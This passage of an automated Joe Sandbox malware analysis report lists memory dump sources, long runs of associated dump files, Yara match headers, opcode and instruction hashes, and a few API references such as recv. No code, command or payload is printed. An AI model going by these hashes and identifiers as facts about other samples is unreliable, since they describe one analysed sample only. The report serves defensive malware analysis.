                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE1103A7748118AE72428D9567546B66B6EF6CB3383308F22F407CA602F2D43A79B131
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fc09d68244921deaecd1215dea8f848a8fa80a2ee48e5b44490cd9a90a12d7a0
                                                                                                                                                                                                                                • Instruction ID: 96cacdfb5dab411825cdf7d941963d223114b39223e263467c4ccf98896ac4e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc09d68244921deaecd1215dea8f848a8fa80a2ee48e5b44490cd9a90a12d7a0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38117AE790C2149DF2128D5819516F6AB2DF3E73383348B27E442CB683F2C8376A6132
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 36f02289236e7a20fa66eff351f6059f5eae03140bab6d0bbd69ae0889400310
                                                                                                                                                                                                                                • Instruction ID: 580c68665e7cf312557dc9994d2658d4a73b59c08e5cc2f18c48c7b62d291e6c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36f02289236e7a20fa66eff351f6059f5eae03140bab6d0bbd69ae0889400310
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D801D2A3B88218EEB2428D9917542BA666EF6972343308F26F403C9542F7C83A797131
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b894352665d09a79ffa7e510d2532c154196b21ad7b5f194a6e8be170cbcf280
                                                                                                                                                                                                                                • Instruction ID: 644a9817a4902899e322606497f50191e8e6b7e16f6fa87457969e039bd6fc35
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b894352665d09a79ffa7e510d2532c154196b21ad7b5f194a6e8be170cbcf280
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1001F2A3748118AE71428D552B146BA6A1EE1D72383308F22B403C9A42F2C83A797032
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8f98f19b48ac9fd2f1dc49e246bcd66ff9946512503ac078e19b44f4203be279
                                                                                                                                                                                                                                • Instruction ID: 946fdeaf5f996505723d87268dc60f1e4d33c81888bb7a434528819daa0504e9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f98f19b48ac9fd2f1dc49e246bcd66ff9946512503ac078e19b44f4203be279
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CF0C2E7688018ED30428D9626146F65A2EE1D7338370CF17F417C8902F3D436797132
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7d622759c1f9dc5777fd744c07ca17a8f9efa3fafadc3611d9eb6578b6ee2e43
                                                                                                                                                                                                                                • Instruction ID: f317ea367a63f486b305d41a59e4a0a7c51e9503abc554ad839c06a95e0038d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d622759c1f9dc5777fd744c07ca17a8f9efa3fafadc3611d9eb6578b6ee2e43
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21F054E7688418AD704288592B556F7572EE2D77383308F12B417D5986B3C837797031
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                • Opcode ID: d066aae4808d816ef89a585398d70e394f520c28165c92077f90300f37dde341
                                                                                                                                                                                                                                • Instruction ID: 2c780b6b3af850a577f7d85cfa57e1d4f22b5fc5f1675e368692af836f24345b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d066aae4808d816ef89a585398d70e394f520c28165c92077f90300f37dde341
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26C22771E086288BDF65CE28DD40BEAB7F5EB48304F1541EAD84DE7241E779AE819F40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 0005E10B
                                                                                                                                                                                                                                • recv.WS2_32(?,?,00000008,00000000), ref: 0005E140
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: recv
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1507349165-0
                                                                                                                                                                                                                                • Opcode ID: 5127974dd445705785488d6e693a95420c8202d7a0df484434f065c7f6b6a39b
                                                                                                                                                                                                                                • Instruction ID: 5aaebafc6b5414d3b901de8087837ddd5bcca4a2bff5eee8bfa4de4d79e8ef3f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5127974dd445705785488d6e693a95420c8202d7a0df484434f065c7f6b6a39b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D531E971A006485FE724CB68CC81BEB77FCEB08724F000625F950E72D1C679A944CBA4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                • Instruction ID: 7b40c3cd77dbd5b68769e00ce3271bb4b2f8363c5b73686f8423afa2957b1c72
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DF13E71E012199BDF14CFA9C8906AEB7F1FF88314F158269E919AB345D731AE01DF90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,0006CF52,?,00000003,00000003,?,0006CF87,?,?,?,00000003,00000003,?,0006C4FD,00052FB9,00000001), ref: 0006CC03
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
